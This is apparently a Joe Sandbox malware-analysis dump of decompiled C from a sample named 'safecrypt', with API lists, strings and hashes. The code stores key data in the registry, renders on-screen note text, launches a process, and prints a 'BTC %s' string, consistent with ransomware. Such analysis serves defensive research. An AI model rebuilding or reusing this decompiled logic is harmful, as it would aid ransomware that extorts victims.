                    				_v31 = 0;
                    				_v27 = 0;
                    				_v23 = 0;
                    				_v19 = 0;
                    				_v15 = 0;
                    				E0042C770( &_v211, 0, 0x40);
                    				_v284 = 0;
                    				E0042C770( &_v283, 0, 0x40);
                    				E0042C770(0x43ff10, 0, 0x100);
                    				_t270 = _t265 + 0x2c;
                    				goto L1;
                    				L3:
                    				_t149 =  *((intOrPtr*)( *0x460aa8 + 4));
                    				if(_t149 != 0) {
                    					 *_t149( &_v68, 0x20);
                    					_t270 = _t270 + 8;
                    				}
                    				if(E00401C10( &_v68) == 0) {
                    					L1:
                    					if( *0x460aa8 == 0) {
                    						 *0x460aa8 = 0x43e45c;
                    					}
                    					goto L3;
                    				} else {
                    					E00420970(0,  &_v68,  &_v104, 0x20);
                    					E0040D860(_v392,  &_v104,  &_v104, 0x20);
                    					_t155 =  *0x43f528; // 0x0
                    					_t272 = _t270 + 0xc;
                    					_v388 = 0;
                    					_v384 = 0;
                    					_t213 = ( *_t155)[0x78];
                    					_push(_t253);
                    					_push( &_v384);
                    					if(_t213 != 0) {
                    						 *_t213(_t155, _t257, _v392, 0,  &_v388);
                    					} else {
                    						_push( &_v388);
                    						_push(0);
                    						_push(_v392);
                    						_push(_t257);
                    						_push(_t155);
                    						E00419F60();
                    					}
                    					_t238 =  *0x43f528; // 0x0
                    					_t157 =  *_t238;
                    					_t214 = _t157[0x50];
                    					_t273 = _t272 + 0x1c;
                    					if(_t214 != 0 || ( *_t157 & 0x00000001) != 0) {
                    						if(_t157 ==  *_t257) {
                    							if(( *_t157 & 0x00000001) == 0) {
                    								 *_t214(_t238, _t257, 4, 0x43ffc0, 0x41, _t253);
                    								_t273 = _t273 + 0x18;
                    							} else {
                    								if(_t157[4] == 0x196) {
                    									E00415650(0x41, _t238, _t257, 0x43ffc0, _t253);
                    									_t273 = _t273 + 0x10;
                    								}
                    							}
                    						}
                    					}
                    					if(_t257 != 0) {
                    						_t195 =  *((intOrPtr*)( *_t257 + 0x2c));
                    						if(_t195 != 0) {
                    							 *_t195(_t257);
                    							_t273 = _t273 + 4;
                    						}
                    						_t196 =  *0x48048c;
                    						if(_t196 != 0) {
                    							 *_t196(_t257, 0);
                    							_t273 = _t273 + 8;
                    						}
                    						 *0x43def4(_t257);
                    						_t198 =  *0x48048c;
                    						_t273 = _t273 + 4;
                    						if(_t198 != 0) {
                    							 *_t198(0, 1);
                    							_t273 = _t273 + 8;
                    						}
                    					}
                    					_t258 = _v396;
                    					E0040D860(_t258, _t238,  &_v68, 0x20);
                    					_t160 =  *0x43f528; // 0x0
                    					_v384 = 0;
                    					_v388 = 0;
                    					_t216 = ( *_t160)[0x78];
                    					_t274 = _t273 + 8;
                    					_push(_t253);
                    					if(_t216 != 0) {
                    						 *_t216(_t160, _v400, _t258, 0,  &_v384,  &_v388);
                    						_t259 = _v400;
                    					} else {
                    						_push( &_v388);
                    						_push( &_v384);
                    						_push(0);
                    						_push(_t258);
                    						_t259 = _v400;
                    						_push(_t259);
                    						_push(_t160);
                    						E00419F60();
                    					}
                    					_t243 =  *0x43f528; // 0x0
                    					_t162 =  *_t243;
                    					_t217 = _t162[0x50];
                    					_t275 = _t274 + 0x1c;
                    					if(_t217 != 0 || ( *_t162 & 0x00000001) != 0) {
                    						if(_t162 ==  *_t259) {
                    							if(( *_t162 & 0x00000001) == 0) {
                    								 *_t217(_t243, _t259, 4,  &_v284, 0x41, _t253);
                    								_t275 = _t275 + 0x18;
                    							} else {
                    								if(_t162[4] == 0x196) {
                    									E00415650(0x41, _t243, _t259,  &_v284, _t253);
                    									_t275 = _t275 + 0x10;
                    								}
                    							}
                    						}
                    					}
                    					_t260 = E00414960( &_v68, _t243);
                    					_t164 = memcpy(0x43ff40, _t260, 0x18 << 2);
                    					_t256 = _t260 + 0x30;
                    					asm("movsb");
                    					E004258B8(_t164);
                    					_t261 = _v396;
                    					_t277 = _t275 + 0x10;
                    					_v68 = 0;
                    					_v64 = 0;
                    					_v60 = 0;
                    					_v56 = 0;
                    					_v52 = 0;
                    					_v48 = 0;
                    					_v44 = 0;
                    					_v40 = 0;
                    					if( *((intOrPtr*)(_t261 + 8)) < 1) {
                    						_t256 = _t261;
                    						_t167 = E0040D690(_t261, 1);
                    						_t277 = _t277 + 4;
                    					} else {
                    						_t167 = _t261;
                    					}
                    					_t307 = _t167;
                    					if(_t167 != 0) {
                    						_t187 =  *_t261;
                    						 *((intOrPtr*)(_t261 + 0xc)) = 0;
                    						 *_t187 = 0;
                    						 *((intOrPtr*)(_t187 + 4)) = 0;
                    						 *((intOrPtr*)(_t261 + 4)) = 0;
                    					}
                    					E0040D490(_t261);
                    					E0040D490(_v392);
                    					E00420970(0,  &_v284,  &_v104, 0x41);
                    					E0042C770( &_v380, 0, 0x60);
                    					_v380 = 0x67452301;
                    					_v376 = 0xefcdab89;
                    					_v372 = 0x98badcfe;
                    					_v368 = 0x10325476;
                    					_v364 = 0xc3d2e1f0;
                    					E0041D2F0( &_v380,  &_v380,  &_v104);
                    					E0041D3D0( &_v31,  &_v380);
                    					E00420970(0,  &_v32,  &_v104, 0x15);
                    					E00420970(0,  &_v104,  &_v140, 0x20);
                    					_v208 = _v28;
                    					_v204 = _v24;
                    					_v196 = _v16;
                    					_v212 = _v32;
                    					_t250 =  &_v212;
                    					_v192 = _v12;
                    					_v200 = _v20;
                    					_v191 = _v140;
                    					_v396 = 0x30;
                    					E00401AB0(0x43ff10,  &_v396,  &_v212);
                    					_push(0x43ff10);
                    					E00425986(0,  &_v212, _t256, _v392, _t307);
                    					E00425DBB(_v140,  &_v212, _t307, 0x440008);
                    					return E004256D3(E0040BBA0(_t256, _v404), 0, _v8 ^ _t264, _t250, _t256, _v404, "BTC     %s\n");
                    				}
                    			}













































































































                    0x004014f9
                    0x00401500
                    0x0040150a
                    0x00401514
                    0x00401517
                    0x0040151a
                    0x0040151d
                    0x00401520
                    0x00401523
                    0x00401526
                    0x00401529
                    0x0040152c
                    0x00401534
                    0x00401536
                    0x00401541
                    0x0040154c
                    0x00401552
                    0x00401558
                    0x0040155d
                    0x00401567
                    0x00401577
                    0x00401583
                    0x00401586
                    0x00401589
                    0x0040158c
                    0x0040158f
                    0x00401592
                    0x00401595
                    0x00401598
                    0x0040159b
                    0x0040159e
                    0x004015a4
                    0x004015aa
                    0x004015b0
                    0x004015b3
                    0x004015b6
                    0x004015b9
                    0x004015bc
                    0x004015bf
                    0x004015c2
                    0x004015c5
                    0x004015c8
                    0x004015cb
                    0x004015ce
                    0x004015d1
                    0x004015d4
                    0x004015e6
                    0x004015ec
                    0x004015ff
                    0x00401604
                    0x00401604
                    0x00401619
                    0x0040161f
                    0x00401624
                    0x0040162c
                    0x0040162e
                    0x0040162e
                    0x0040163b
                    0x00401607
                    0x0040160d
                    0x0040160f
                    0x0040160f
                    0x00000000
                    0x0040163d
                    0x00401645
                    0x00401659
                    0x0040165e
                    0x00401665
                    0x00401668
                    0x0040166e
                    0x00401674
                    0x00401677
                    0x0040167e
                    0x00401681
                    0x004016ac
                    0x00401683
                    0x0040168f
                    0x00401690
                    0x00401691
                    0x00401692
                    0x00401693
                    0x00401694
                    0x00401694
                    0x004016ae
                    0x004016b4
                    0x004016b6
                    0x004016b9
                    0x004016be
                    0x004016c7
                    0x004016cc
                    0x004016fa
                    0x004016fc
                    0x004016ce
                    0x004016d5
                    0x004016e4
                    0x004016e9
                    0x004016e9
                    0x004016d5
                    0x004016cc
                    0x004016c7
                    0x00401701
                    0x00401705
                    0x0040170a
                    0x0040170d
                    0x0040170f
                    0x0040170f
                    0x00401712
                    0x00401719
                    0x0040171d
                    0x0040171f
                    0x0040171f
                    0x00401723
                    0x00401729
                    0x0040172e
                    0x00401733
                    0x00401738
                    0x0040173a
                    0x0040173a
                    0x00401733
                    0x0040173d
                    0x0040174b
                    0x00401750
                    0x00401757
                    0x0040175d
                    0x00401763
                    0x00401766
                    0x00401769
                    0x0040176c
                    0x004017a5
                    0x004017a7
                    0x0040176e
                    0x00401774
                    0x0040177b
                    0x0040177c
                    0x0040177d
                    0x0040177e
                    0x00401784
                    0x00401785
                    0x00401786
                    0x00401786
                    0x004017ad
                    0x004017b3
                    0x004017b5
                    0x004017b8
                    0x004017bd
                    0x004017c6
                    0x004017cb
                    0x004017fd
                    0x004017ff
                    0x004017cd
                    0x004017d4
                    0x004017e5
                    0x004017ea
                    0x004017ea
                    0x004017d4
                    0x004017cb
                    0x004017c6
                    0x0040180a
                    0x00401816
                    0x00401816
                    0x00401819
                    0x0040181a
                    0x0040181f
                    0x00401827
                    0x0040182a
                    0x0040182d
                    0x00401830
                    0x00401833
                    0x00401836
                    0x00401839
                    0x0040183c
                    0x0040183f
                    0x00401846
                    0x0040184e
                    0x00401850
                    0x00401855
                    0x00401848
                    0x00401848
                    0x00401848
                    0x00401858
                    0x0040185a
                    0x0040185c
                    0x0040185e
                    0x00401861
                    0x00401863
                    0x00401866
                    0x00401866
                    0x00401869
                    0x00401874
                    0x00401884
                    0x00401896
                    0x004018a8
                    0x004018b2
                    0x004018bc
                    0x004018c6
                    0x004018d0
                    0x004018da
                    0x004018ec
                    0x004018fc
                    0x0040190f
                    0x0040191d
                    0x00401926
                    0x00401932
                    0x00401938
                    0x00401941
                    0x00401947
                    0x00401954
                    0x00401966
                    0x0040196c
                    0x00401976
                    0x0040197e
                    0x00401988
                    0x00401992
                    0x004019b5
                    0x004019b5

                    APIs
                    • _memset.LIBCMT ref: 004015D4
                    • _memset.LIBCMT ref: 004015EC
                    • _memset.LIBCMT ref: 004015FF
                    • _free.LIBCMT ref: 0040181A
                    • _memset.LIBCMT ref: 00401896
                      • Part of subcall function 00420970: _memset.LIBCMT ref: 0042099C
                      • Part of subcall function 00401AB0: _malloc.LIBCMT ref: 00401B20
                      • Part of subcall function 00401AB0: _memset.LIBCMT ref: 00401B2B
                    • _wprintf.LIBCMT ref: 00401988
                    • __time64.LIBCMT ref: 00401992
                      • Part of subcall function 00425DBB: GetSystemTimeAsFileTime.KERNEL32(00411657,?,?,?,00411657,?,00000000,00418C28,?,?,004117A9,00000000,000000FF,CCCCC35B,004118DB), ref: 00425DC6
                      • Part of subcall function 00425DBB: __aulldiv.LIBCMT ref: 00425DE6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Time$FileSystem__aulldiv__time64_free_malloc_wprintf
                    • String ID: 0$BTC %s
                    • API String ID: 2366515660-1076587282
                    • Opcode ID: d669ad066ac1abb477a1ad36b389851217340f1376af89e1f5ca5451d9548d8a
                    • Instruction ID: 1f391e7b0772b7941665ac3f75a90abcd78d560ddf3e36c3af1d9f0333ac42cc
                    • Opcode Fuzzy Hash: d669ad066ac1abb477a1ad36b389851217340f1376af89e1f5ca5451d9548d8a
                    • Instruction Fuzzy Hash: 02E15DB1D00218AFDB20DFA5DC81BDEB7B4AF49304F5444BEE508B7291E6745A84CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00420560(intOrPtr* __eax) {
                    				struct HDC__* _v8;
                    				void* _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				char _v28;
                    				void* __edi;
                    				void* __esi;
                    				void* _t32;
                    				struct HDC__* _t35;
                    				struct HDC__* _t36;
                    				intOrPtr* _t37;
                    
                    				_t37 = __eax;
                    				_t35 = GetDC(0);
                    				 *_t37 = 0;
                    				 *((intOrPtr*)(_t37 + 4)) = 0;
                    				 *(_t37 + 8) = 0x47e;
                    				_v8 = _t35;
                    				_v24 = 0;
                    				_v20 = 0;
                    				_v16 = 0;
                    				_v12 = 0;
                    				 *(_t37 + 0xc) = 0x3e8;
                    				_t32 = CreateCompatibleBitmap(_t35, 0x47e, 0x3e8);
                    				if(_t32 != 0) {
                    					_t36 = CreateCompatibleDC(_t35);
                    					if(_t36 != 0) {
                    						_v12 = SelectObject(_t36, _t32);
                    						SetBkMode(_t36, 1);
                    						SetTextColor(_t36, 0xffffff);
                    						E00420180(_t36,  &_v28);
                    						SelectObject(_t36, _v12);
                    						DeleteDC(_t36);
                    						_v12 = 1;
                    					}
                    					_t35 = _v8;
                    				}
                    				ReleaseDC(0, _t35);
                    				if(_v12 != 0 || _t32 == 0) {
                    					return _t32;
                    				} else {
                    					DeleteObject(_t32);
                    					return 0;
                    				}
                    			}















                    0x0042056b
                    0x00420573
                    0x00420582
                    0x00420586
                    0x0042058a
                    0x0042058e
                    0x00420591
                    0x00420594
                    0x00420597
                    0x0042059a
                    0x0042059d
                    0x004205a6
                    0x004205aa
                    0x004205b3
                    0x004205b7
                    0x004205c4
                    0x004205c7
                    0x004205d3
                    0x004205dc
                    0x004205e6
                    0x004205ed
                    0x004205f3
                    0x004205f3
                    0x004205fa
                    0x004205fa
                    0x00420600
                    0x0042060a
                    0x00420628
                    0x00420610
                    0x00420611
                    0x0042061f
                    0x0042061f

                    APIs
                    • GetDC.USER32(00000000), ref: 0042056D
                    • CreateCompatibleBitmap.GDI32(00000000,0000047E,000003E8), ref: 004205A0
                    • CreateCompatibleDC.GDI32(00000000), ref: 004205AD
                    • SelectObject.GDI32(00000000,00000000), ref: 004205BB
                    • SetBkMode.GDI32(00000000,00000001), ref: 004205C7
                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 004205D3
                      • Part of subcall function 00420180: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma,00000000,004205E1), ref: 004201A3
                      • Part of subcall function 00420180: SelectObject.GDI32(00000000,00000000), ref: 004201AD
                      • Part of subcall function 00420180: DrawTextA.USER32(00000000,00460B30,000000FF,?,00000400), ref: 004201CE
                      • Part of subcall function 00420180: DrawTextA.USER32(00000000,00460B30,000000FF,?,00000010), ref: 004201DF
                      • Part of subcall function 00420180: GetStockObject.GDI32(0000000D), ref: 004201E7
                      • Part of subcall function 00420180: SelectObject.GDI32(00000000,00000000), ref: 004201EF
                      • Part of subcall function 00420180: DeleteObject.GDI32(00000000), ref: 004201F6
                    • SelectObject.GDI32(00000000,?), ref: 004205E6
                    • DeleteDC.GDI32(00000000), ref: 004205ED
                    • ReleaseDC.USER32 ref: 00420600
                    • DeleteObject.GDI32(00000000), ref: 00420611
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object$Select$CreateDeleteText$CompatibleDraw$BitmapColorFontModeReleaseStock
                    • String ID:
                    • API String ID: 1917954226-0
                    • Opcode ID: de6474931d4f566070a13d8dee6f3924d7975ad4bda2ba3966dceb16af23b2a6
                    • Instruction ID: 328a9cffe78a55ba7bf06b0334749a40d47015771e64c7311d8d2b777c10a032
                    • Opcode Fuzzy Hash: de6474931d4f566070a13d8dee6f3924d7975ad4bda2ba3966dceb16af23b2a6
                    • Instruction Fuzzy Hash: 61219871A00209AFD7109FA59C886AFBBF8EF85711F10407EF509E3261DB7449458F64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00420180(struct HDC__* __edi, struct tagRECT* __esi) {
                    				void* _t10;
                    
                    				_t10 = CreateFontW(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0x20, L"Tahoma");
                    				SelectObject(__edi, _t10);
                    				 *__esi = 0xa;
                    				__esi->top = 0xa;
                    				DrawTextA(__edi, 0x460b30, 0xffffffff, __esi, 0x400);
                    				DrawTextA(__edi, 0x460b30, 0xffffffff, __esi, 0x10);
                    				SelectObject(__edi, GetStockObject(0xd));
                    				DeleteObject(_t10);
                    				return __esi;
                    			}




                    0x004201a9
                    0x004201ad
                    0x004201c1
                    0x004201c7
                    0x004201ce
                    0x004201df
                    0x004201ef
                    0x004201f6
                    0x004201ff

                    APIs
                    • CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma,00000000,004205E1), ref: 004201A3
                    • SelectObject.GDI32(00000000,00000000), ref: 004201AD
                    • DrawTextA.USER32(00000000,00460B30,000000FF,?,00000400), ref: 004201CE
                    • DrawTextA.USER32(00000000,00460B30,000000FF,?,00000010), ref: 004201DF
                    • GetStockObject.GDI32(0000000D), ref: 004201E7
                    • SelectObject.GDI32(00000000,00000000), ref: 004201EF
                    • DeleteObject.GDI32(00000000), ref: 004201F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Object$DrawSelectText$CreateDeleteFontStock
                    • String ID: Tahoma
                    • API String ID: 176621763-3580928618
                    • Opcode ID: 28fd0fc6595f44c29b544fd78dc1759e5ffbb4afa876926a2ec2057816dfe5c0
                    • Instruction ID: a4d775d842f8463d2a934e24540462e07dd033812beda5b6e802fcbc69bda8d0
                    • Opcode Fuzzy Hash: 28fd0fc6595f44c29b544fd78dc1759e5ffbb4afa876926a2ec2057816dfe5c0
                    • Instruction Fuzzy Hash: 45F01D703C43107BF2241BD09C8FFAA3A689B06F51F301225F712B81F1DAE824419A2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00401000(void* __ebx, void* __edi, void* __esi) {
                    				signed int _v8;
                    				char _v262;
                    				short _v264;
                    				void* _v268;
                    				signed int _t11;
                    				signed int _t34;
                    
                    				_t11 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t11 ^ _t34;
                    				_v264 = 0;
                    				E0042C770( &_v262, 0, 0xfe);
                    				E00401C90(0x80,  &_v264, L"Software\\%s", 0x43fee0);
                    				RegCreateKeyExW(0x80000001,  &_v264, 0, 0, 0, 0x20006, 0,  &_v268, 0);
                    				RegSetValueExW(_v268, L"data", 0, 3, 0x43ff10, 0x100);
                    				RegFlushKey(_v268);
                    				return E004256D3(RegCloseKey(_v268), __ebx, _v8 ^ _t34, _v268, __edi, __esi);
                    			}









                    0x00401009
                    0x00401010
                    0x00401022
                    0x00401029
                    0x00401044
                    0x0040106e
                    0x0040108e
                    0x0040109b
                    0x004010bb

                    APIs
                    • _memset.LIBCMT ref: 00401029
                      • Part of subcall function 00401C90: __strftime_l.LIBCMT ref: 00401CA5
                    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0040106E
                    • RegSetValueExW.ADVAPI32(?,data,00000000,00000003,0043FF10,00000100), ref: 0040108E
                    • RegFlushKey.ADVAPI32(?), ref: 0040109B
                    • RegCloseKey.ADVAPI32(?), ref: 004010A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateFlushValue__strftime_l_memset
                    • String ID: Software\%s$data
                    • API String ID: 664986230-2588080539
                    • Opcode ID: 5bc41a5ff75043438be418c12076d170ae68baaa51571a2b779549056e91b5b0
                    • Instruction ID: a63e5f6407e12cfac8a4a717aa8505447b8683b7f26cbe654585183c6d5e3059
                    • Opcode Fuzzy Hash: 5bc41a5ff75043438be418c12076d170ae68baaa51571a2b779549056e91b5b0
                    • Instruction Fuzzy Hash: 1B11A578B80318BBD724DB60DD46FDA73B89B1CB00F501099B645B61D1DAF46AC48B5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E0041F2F0() {
                    				void* _v8;
                    				void* _v12;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t16;
                    				signed int _t17;
                    				intOrPtr* _t19;
                    				signed int _t21;
                    				void* _t22;
                    				signed int _t27;
                    				char* _t31;
                    				void* _t34;
                    				intOrPtr _t36;
                    				intOrPtr _t39;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				signed int _t43;
                    
                    				_t16 =  &_v12;
                    				_v8 = 0;
                    				_v12 = 0;
                    				__imp__GdipGetImageEncodersSize( &_v8, _t16);
                    				_t42 = _v12;
                    				if(_t42 != 0) {
                    					_t17 = E004258F2(_t34, 0, _t42, _t42);
                    					_t27 = _t17;
                    					if(_t27 == 0) {
                    						L15:
                    						return _t17 | 0xffffffff;
                    					} else {
                    						__imp__GdipGetImageEncoders(_v8, _t42, _t27);
                    						_t43 = 0;
                    						if(_v8 <= 0) {
                    							L14:
                    							_t17 = E004258B8(_t27);
                    							goto L15;
                    						} else {
                    							_t8 = _t27 + 0x30; // 0x30
                    							_t41 = _t8;
                    							do {
                    								_t19 =  *_t41;
                    								_t31 = L"image/png";
                    								while(1) {
                    									_t36 =  *_t19;
                    									if(_t36 !=  *_t31) {
                    										break;
                    									}
                    									if(_t36 == 0) {
                    										L10:
                    										_t19 = 0;
                    									} else {
                    										_t39 =  *((intOrPtr*)(_t19 + 2));
                    										if(_t39 != _t31[2]) {
                    											break;
                    										} else {
                    											_t19 = _t19 + 4;
                    											_t31 =  &(_t31[4]);
                    											if(_t39 != 0) {
                    												continue;
                    											} else {
                    												goto L10;
                    											}
                    										}
                    									}
                    									L12:
                    									if(_t19 == 0) {
                    										_t21 = _t43 * 0x4c;
                    										_t22 = _t21 + _t27;
                    										 *0x43f9e0 =  *((intOrPtr*)(_t21 + _t27));
                    										 *0x43f9e4 =  *((intOrPtr*)(_t22 + 4));
                    										 *0x43f9e8 =  *((intOrPtr*)(_t22 + 8));
                    										 *0x43f9ec =  *((intOrPtr*)(_t22 + 0xc));
                    										E004258B8(_t27);
                    										return _t43;
                    									} else {
                    										goto L13;
                    									}
                    									goto L17;
                    								}
                    								asm("sbb eax, eax");
                    								asm("sbb eax, 0xffffffff");
                    								goto L12;
                    								L13:
                    								_t43 = _t43 + 1;
                    								_t41 = _t41 + 0x4c;
                    							} while (_t43 < _v8);
                    							goto L14;
                    						}
                    					}
                    				} else {
                    					return _t16 | 0xffffffff;
                    				}
                    				L17:
                    			}




















                    0x0041f2f8
                    0x0041f302
                    0x0041f305
                    0x0041f308
                    0x0041f30e
                    0x0041f313
                    0x0041f320
                    0x0041f325
                    0x0041f32c
                    0x0041f391
                    0x0041f39a
                    0x0041f32e
                    0x0041f334
                    0x0041f33a
                    0x0041f33f
                    0x0041f388
                    0x0041f389
                    0x00000000
                    0x0041f341
                    0x0041f341
                    0x0041f341
                    0x0041f344
                    0x0041f344
                    0x0041f346
                    0x0041f350
                    0x0041f350
                    0x0041f356
                    0x00000000
                    0x00000000
                    0x0041f35b
                    0x0041f372
                    0x0041f372
                    0x0041f35d
                    0x0041f35d
                    0x0041f365
                    0x00000000
                    0x0041f367
                    0x0041f367
                    0x0041f36a
                    0x0041f370
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041f370
                    0x0041f365
                    0x0041f37b
                    0x0041f37d
                    0x0041f39d
                    0x0041f3a3
                    0x0041f3a5
                    0x0041f3ae
                    0x0041f3b7
                    0x0041f3c1
                    0x0041f3c7
                    0x0041f3d7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041f37d
                    0x0041f376
                    0x0041f378
                    0x00000000
                    0x0041f37f
                    0x0041f37f
                    0x0041f380
                    0x0041f383
                    0x00000000
                    0x0041f344
                    0x0041f33f
                    0x0041f316
                    0x0041f31d
                    0x0041f31d
                    0x00000000

                    APIs
                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0041F308
                    • _malloc.LIBCMT ref: 0041F320
                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0041F334
                    • _free.LIBCMT ref: 0041F389
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodersGdipImage$Size_free_malloc
                    • String ID: image/png
                    • API String ID: 3010823376-2966254431
                    • Opcode ID: f552d4a079a4a9f77aaf0b8c59e687a2479290ebdf56b6ef202600ec682154f0
                    • Instruction ID: 70448b10b7d980e2106910c8b22e3be5ea8dd5646220fd99ee2e324851fc0f6e
                    • Opcode Fuzzy Hash: f552d4a079a4a9f77aaf0b8c59e687a2479290ebdf56b6ef202600ec682154f0
                    • Instruction Fuzzy Hash: 79212BB2A001149B8710DF58EC815EBB3A9EFA837071543B7DC1997350E335EE86C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0041F1C0(intOrPtr _a4) {
                    				char _v12;
                    				void* _v24;
                    				void* _v28;
                    				short _v56;
                    				intOrPtr _v60;
                    				char _v104;
                    				intOrPtr* _t14;
                    				intOrPtr* _t17;
                    				intOrPtr* _t23;
                    
                    				_t14 =  *0x480454;
                    				_v12 = 0;
                    				if(_t14 != 0) {
                    					 *_t14( &_v12);
                    				}
                    				E0042C770( &_v104, 0, 0x44);
                    				_v56 = 0;
                    				_v60 = 1;
                    				_v104 = 0x44;
                    				_t17 = E00412FC0( &_v104, 0, 1, 0x46318ac7);
                    				 *_t17(0, _a4, 0, 0, 0, 0x20, 0, 0,  &_v104,  &_v28);
                    				WaitForSingleObject(_v28, 0x7530);
                    				CloseHandle(_v28);
                    				CloseHandle(_v24);
                    				Sleep(0x3e8);
                    				_t23 =  *0x480458;
                    				if(_t23 != 0) {
                    					return  *_t23(_v12);
                    				}
                    				return _t23;
                    			}












                    0x0041f1c6
                    0x0041f1cc
                    0x0041f1d5
                    0x0041f1db
                    0x0041f1db
                    0x0041f1e5
                    0x0041f1f4
                    0x0041f1f8
                    0x0041f1ff
                    0x0041f206
                    0x0041f228
                    0x0041f233
                    0x0041f243
                    0x0041f249
                    0x0041f250
                    0x0041f256
                    0x0041f25d
                    0x00000000
                    0x0041f263
                    0x0041f269

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$ObjectSingleSleepWait_memset
                    • String ID: D
                    • API String ID: 388116002-2746444292
                    • Opcode ID: 3986a9fa16e21a0b991ae15bb4f052141a5bc07713006742b3d382f84ea9a55f
                    • Instruction ID: f809c26ed1eb9ca7b5bf098f26b21b8e85199e8e94584684ef88688eb9744c68
                    • Opcode Fuzzy Hash: 3986a9fa16e21a0b991ae15bb4f052141a5bc07713006742b3d382f84ea9a55f
                    • Instruction Fuzzy Hash: 40117775A50309BBEB14DBE4DD86FEE7778AB48B04F100519B704AB2D0D7B4BA44C7A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0042A7D8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t26;
                    				intOrPtr _t30;
                    				intOrPtr _t39;
                    				void* _t40;
                    
                    				_t31 = __ebx;
                    				_push(8);
                    				_push(0x43a1d0);
                    				E00428D80(__ebx, __edi, __esi);
                    				GetModuleHandleW(L"KERNEL32.DLL");
                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                    				 *((intOrPtr*)(_t39 + 0x5c)) = 0x432228;
                    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                    				 *((char*)(_t39 + 0xc8)) = 0x43;
                    				 *((char*)(_t39 + 0x14b)) = 0x43;
                    				 *(_t39 + 0x68) = 0x43d420;
                    				E0042CD4F(__ebx, 1, 0xd);
                    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                    				InterlockedIncrement( *(_t39 + 0x68));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				E0042A87A();
                    				E0042CD4F(_t31, 1, 0xc);
                    				 *(_t40 - 4) = 1;
                    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                    				if(_t26 == 0) {
                    					_t30 =  *0x43db88; // 0x43dab0
                    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                    				}
                    				E0042A41C( *((intOrPtr*)(_t39 + 0x6c)));
                    				 *(_t40 - 4) = 0xfffffffe;
                    				return E00428DC5(E0042A883());
                    			}







                    0x0042a7d8
                    0x0042a7d8
                    0x0042a7da
                    0x0042a7df
                    0x0042a7e9
                    0x0042a7ef
                    0x0042a7f2
                    0x0042a7f9
                    0x0042a800
                    0x0042a803
                    0x0042a806
                    0x0042a80d
                    0x0042a814
